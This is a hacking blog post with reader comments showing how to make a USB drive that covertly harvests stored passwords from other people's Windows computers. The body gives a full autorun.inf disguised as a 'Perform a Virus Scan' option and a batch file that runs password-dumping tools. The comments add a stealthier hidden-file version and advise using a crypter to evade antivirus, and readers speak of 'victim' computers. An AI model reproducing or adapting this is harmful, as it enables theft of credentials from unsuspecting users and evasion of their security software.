How to Hack Passwords Using An USB Drive

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE ,chrome and Firefox. There exists many tools for recovering these passwords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff /hack passwords from any computer.



Things We Need
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

ChromePass : It is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry, the following information is displayed: Origin URL, Action URL, User Name Field, Password Field, User Name, Password, and Created Time. You can select one or more items and then save them into text/html/xml file or copy them to the clipboard.



Download

I have uploaded all  the Hacking tools in a single package click on the download button to download all the tools and to get the password click Here 



How to Hack Passwords Using An USB Drive

1. After downloading  all the tools, from the above link extract and copy all the executable(.exe files) which is inside the "USB pass hack" folder  into your USB- Pendrive.


2. Now open a Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from New Text Document.txt to autorun.inf ,Now copy the autorun.inf file onto your USB pen drive.

3. Now open an another Notepad and copy  the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

start ChromePass.exe /stext chrome.txt


Now save the file as launch.bat ,Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff /hack the passwords. You can use this pen-drive on any computer to sniff the stored passwords. Just follow the steps given below


1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files. as  shown ,open the files to view the stored passwords


This hack works on Windows 2000, XP, Vista and Windows 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

If you have any doubts regarding the hack please pass your comments for further doubts and clarifications 

Subscribe to Hackaholic

Enjoyed this article?
Subscribe to "Hackaholic"and get daily
updates in your inbox for free!

Related Posts Plugin for WordPress, Blogger...

Anonymous

Hello. I think this hack is really useful for recovering lost passwords. But I have a problem. I can't download the http://www.ziddu.com/download/15440520/usbhack.rar.html (the hacking files we need o do this tutorial.) so please fix the link. Thank you.

REPLY
John said on June 23, 2011 at 6:26 AM :

@anonymous
The links are working .. please turn off the popup blocker before downloading files from ziddu.com

REPLY
Anonymous

It works, unless you have avast! It blocks them right away

REPLY
Anonymous

Help!! The download for the ZIP doesn't work!! Look what happens!! http://oi53.tinypic.com/ibza0l.jpg

REPLY
John said on June 25, 2011 at 7:51 PM :

@Anonymous

you need winrar or winzip to open these files

REPLY
Sơn said on June 27, 2011 at 7:11 PM :

AVG internet security detected trojan!

REPLY
Anonymous

I'm noob in this stuff.
Why doesn't my autorun display the option "Perform a Virus Scan" when I plug my usb drive?

I made copy&past to the file "autorun.inf".

REPLY
John said on June 28, 2011 at 3:11 AM :

@Anonymous
If the auto run is disabled in the computer ,you need to enable it or open the hacking tools manually

REPLY
Anonymous

Access denied on all attempts
Whats going on please

REPLY
John said on July 1, 2011 at 9:24 AM :

@Anonymous

can you describe the problem when do you get this message

REPLY
Anonymous

It sniffed all the passwords on my computer (Windows XP Desktop) perfect.
I then tried to use it on another computer (windows XP Laptop). It did the autorun came up with run virus scan hit that and then as each exe file ran it would give me a line below each that said access denied.

Ex: G:\>start mpass.exe /stext mspass.txt
Access is denied.

G:\>start mailpv.exe /stext mailpv.txt
Access is denied.

and so on

REPLY
Anonymous

i have just done it but will it work on my cuzins comp

REPLY
Anonymous

Hey what is the password for that encrypted files?When I opened that,it asked for a password.What is that?

REPLY
John ( Admin ) said on November 6, 2011 at 4:59 AM :

@Anonymous

i guess u dint read it properly i have given the link to download the password any way heres the link

http://www.ziddu.com/download/12526506/hackaholicpassword.rar.html

REPLY
Anonymous

Good work...But I need solution for 2 issues:

1. The command prompt did not run in the background so how to make it run in the background without being visible.

2. I do not want the *.txt files that contain the retrieved passwords to be visible either(the should be in hidden mode).

REPLY
Secret Contributor

John, thanks for this nice tutorial.

One thing I noticed is that if you run this twice, the files are overwritten rather than appended; therefore, I modified the autorun and batch files to make it easier for those wanting to quickly and easily sniff the passwords from multiple computers. Additionally, I've also made it so that the date and computer/username are displayed before each password dump.

Here are the autorun.inf contents:

[AutoRun]
shellexecute=cmd /c start /min launch.bat
useautoplay=1

And here's the contents of launch.bat:

@echo off

(echo Date: %date% %time% && echo User: \\%computername%\%username%) >> mspass.txt
(echo Date: %date% %time% && echo User: \\%computername%\%username%) >> mailpv.txt
(echo Date: %date% %time% && echo User: \\%computername%\%username%) >> iepv.txt
(echo Date: %date% %time% && echo User: \\%computername%\%username%) >> pspv.txt
(echo Date: %date% %time% && echo User: \\%computername%\%username%) >> passwordfox.txt
(echo Date: %date% %time% && echo User: \\%computername%\%username%) >> chrome.txt

start mspass.exe /stext mspass2.txt
start mailpv.exe /stext mailpv2.txt
start iepv.exe /stext iepv2.txt
start pspv.exe /stext pspv2.txt
start passwordfox.exe /stext passwordfox2.txt
start ChromePass.exe /stext chrome2.txt

ping 1.1.1.1 -n 1 -w 5000 > NUL

copy mspass.txt+mspass2.txt
copy mailpv.txt+mailpv2.txt
copy iepv.txt+iepv2.txt
copy pspv.txt+pspv2.txt
copy passwordfox.txt+passwordfox2.txt
copy chrome.txt+chrome2.txt

DEL /F /Q mspass2.txt
DEL /F /Q mailpv2.txt
DEL /F /Q iepv2.txt
DEL /F /Q pspv2.txt
DEL /F /Q passwordfox2.txt
DEL /F /Q chrome2.txt

exit

In response to Anonymous, whose comment is directly before mine, if you change your autorun.inf file to what I've written above, that ought to take care of your visibility issue. As for making the *.txt files hidden, simply append the following to the end of launch.bat in John's code or immediately before "exit" in my above commands:

attrib +h mspass.txt
attrib +h mailpv.txt
attrib +h iepv.txt
attrib +h pspv.txt
attrib +h passwordfox.txt
attrib +h chrome.txt

However, if you are going to make the *.txt files hidden, I'd also recommend that you make the autorun.inf file as well as all the *.exe files hidden, or better yet hidden system files (to make them hidden system files, instead of only typing "+h" type "+h +s"). Or better yet, make them cleverly named hidden system files in an equally cleverly named sub-directory (but just make sure to keep autorun.inf in the root directory with the same name).

REPLY
John ( Admin ) said on January 16, 2012 at 12:44 AM :

@Secret Contributor

thanks for the info >>>

REPLY
Anonymous

what is the password of the .rar file?

REPLY
Anonymous

I tried it and it works on a desktop windows 7 but on a laptop windows xp. how can I fix this?to work on p too? M.A.

REPLY
Kyle said on April 2, 2012 at 11:26 PM :

The password isnt working anymore

REPLY
Anonymous

thnks ..it works .. but tell me how to delete already hacked passwords from passwordfox file... so i can hacked the new 1..

REPLY
harry said on April 17, 2012 at 4:02 AM :

how to delete the old passwords from passwordfox. plz telll

REPLY
jaspreet said on April 28, 2012 at 1:46 AM :

thanks for this really amazing blog post... you rock admin..

REPLY
Jswat Josh said on June 11, 2012 at 5:13 AM :

Help, only works if anti virus is disabled, which on most computers never happens

REPLY
Dil said on July 2, 2012 at 6:33 AM :

PLease tell me a way to pass the anti virus. I have avg and it detects this as a threat.

REPLY
Email feltörés said on August 24, 2012 at 9:49 AM :

You need to use a crypter to avoid AV detection.

REPLY
Joshua Sanders said on November 26, 2012 at 11:55 PM :

So the main reason for me looking into this is to sniff a win7 admin password. Is this even possible?

REPLY
r3nwa said on December 14, 2012 at 7:27 AM :

need rar pw plz help

REPLY
John ( Admin ) said on December 14, 2012 at 7:36 AM :
This comment has been removed by the author. REPLY
r3nwa said on December 14, 2012 at 7:42 AM :

Ty john my bad lol

REPLY
Unknown said on January 14, 2013 at 7:11 PM :

does it work on windwos 8?

REPLY
Mary Ann Pile said on January 24, 2013 at 5:32 AM :

Can you help me with that tool? I'm willing to pay admin.

REPLY
Jacek Ignaszak said on February 4, 2013 at 10:14 AM :

Hey I did this but when i plug it in, in the autorun window, there is only view in folder but no Virus Scan option. Please Help!!!

REPLY
meena meghavath said on February 17, 2013 at 10:00 AM :

After copying the files into the pendrive i kept it in the victim computer but the pop up window is not appering now what should i do

REPLY
John ( Admin ) said on February 20, 2013 at 10:56 AM :

@meena meghavath

check whether autorun facility is switched on the pc

REPLY
Rahul Kumar said on February 24, 2013 at 1:24 PM :

not able to extract the file.....
showing exe file

REPLY
Muhammad Abdullah said on March 18, 2013 at 1:48 PM :

pwd link is not wurking, plz help

REPLY
John ( Admin ) said on March 20, 2013 at 10:26 PM :

@Muhammad Abdullah

Please check again everything seems to work fine from our side

REPLY
rahul verma said on March 22, 2013 at 11:28 AM :

this autorun thing is not working in my computer or victim computer.How can we automatically enable these thing.If automatically is not possible then how can I enable it manually.

REPLY
muzaffar_danger4all said on March 28, 2013 at 12:41 PM :

Hello. I think this hack is really useful for recovering lost passwords. But I have a problem. I can't download the http://www.ziddu.com/download/12526506/hackaholicpassword.rar.html so please fix the link. Thank you.

REPLY
John ( Admin ) said on March 29, 2013 at 7:03 AM :

@muzaffar_danger4all
The Links are updated please have a look

REPLY
Atul Vikram Singh said on March 31, 2013 at 11:27 PM :

as tell by "Secret Contributor" above how i get password when .txt files are hidden????

REPLY
John ( Admin ) said on March 31, 2013 at 11:44 PM :

@muzaffar_danger4all

the password file is not that one the file is http://www.ziddu.com/download/20827628/pass.rar.html

or try
Password = @hackaholic

REPLY
omkar fatale said on May 20, 2013 at 1:08 AM :

Great information John,
But when I tried to download the rar files the extension was ".rar.exe" , What is wrong with this?

REPLY
Mohd Asif said on May 28, 2013 at 11:54 PM :

Sir I downloaded your usb hack tool and pass.rar file but on extracting its showing error and unable to extract. Now tell me what should i do to correct it?

REPLY
kaziama said on July 27, 2013 at 7:26 AM :

does that work on adeffrent browsers . such as opera or another browser .

REPLY
John ( Admin ) said on July 27, 2013 at 9:09 PM :

@kaziama

i have not tried on opera but it works fine with chrome and firefox

REPLY
kang said on July 29, 2013 at 8:17 AM :

Can it also get skype's password?

REPLY
jhonatangx said on May 30, 2014 at 9:03 PM :

How do I get when running launch.bat the log files to be sent to folders other than the root?

Ex: Given Folder ....

mspass.exe / start mspass.txt stext

mailpv.exe / start mailpv.txt stext

iepv.exe start / iepv.txt stext

pspv.exe start / pspv.txt stext

passwordfox.exe start / passwordfox.txt stext

start ChromePass.exe chrome.txt / stext

How will I make changes in the code above?
I await response thanks! :)

REPLY

Use the form below to comment. No spam please!!!

© 101hacker | Design by Mukund edited by John
Powered by Blogger